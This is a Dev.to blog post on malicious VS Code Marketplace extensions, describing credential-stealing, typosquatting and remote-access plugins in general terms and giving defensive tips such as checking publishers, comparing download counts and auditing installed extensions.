VS Code's Unhinged Malware Problem: What Microsoft’s Own Logs Reveal

Source: Dev.to

Introduction

If you are like me, your VS Code setup is a carefully curated collection of themes, linters, and productivity boosters. We trust the Visual Studio Marketplace to be a safe haven for tools that make our lives easier. However, a look at the official list of removed extensions on GitHub reveals a much uglier picture.

The Marketplace operates on a reactive model. Microsoft runs automated scans, but a large amount of malicious code is only taken down after it has already been published and downloaded by unsuspecting developers.

Types of Malicious Extensions

• Credential Theft – Extensions that scrape .env files, SSH keys, or other sensitive credentials.
• Typosquatting – Malicious clones of popular extensions (e.g., Prettier, ESLint) that rely on a tiny misspelling in the name to trick users.
• Remote Access – Plugins that open backdoors into your development environment, allowing attackers to read files, track keystrokes, and exfiltrate data.

How to Protect Yourself

Check the Publisher

Look for the “Verified” checkmark. If a popular tool is published by a random account with no history, avoid it.

Verify the Numbers

If an extension claims to be a widely used tool but has only a few hundred downloads while the legitimate one has millions, it is likely a typosquatting attempt.

Audit Your List

Periodically review your installed extensions. Extensions that haven’t been updated in years should be re‑evaluated for safety.

Do a Deeper Scan

Basic store filters can be bypassed. Use a VS Code extension security analyzer to perform a deep assessment, checking for obfuscated code, hidden network connections, and dangerous dependencies. The analyzer will generate a risk report before the code touches your machine.

Conclusion

The VS Code Marketplace is an incredible resource, but we must stop assuming it is inherently safe. The “Removed Packages” list proves that malware continuously slips through the cracks. Spend a few minutes today auditing your extensions—it’s far better than dealing with a compromised machine later.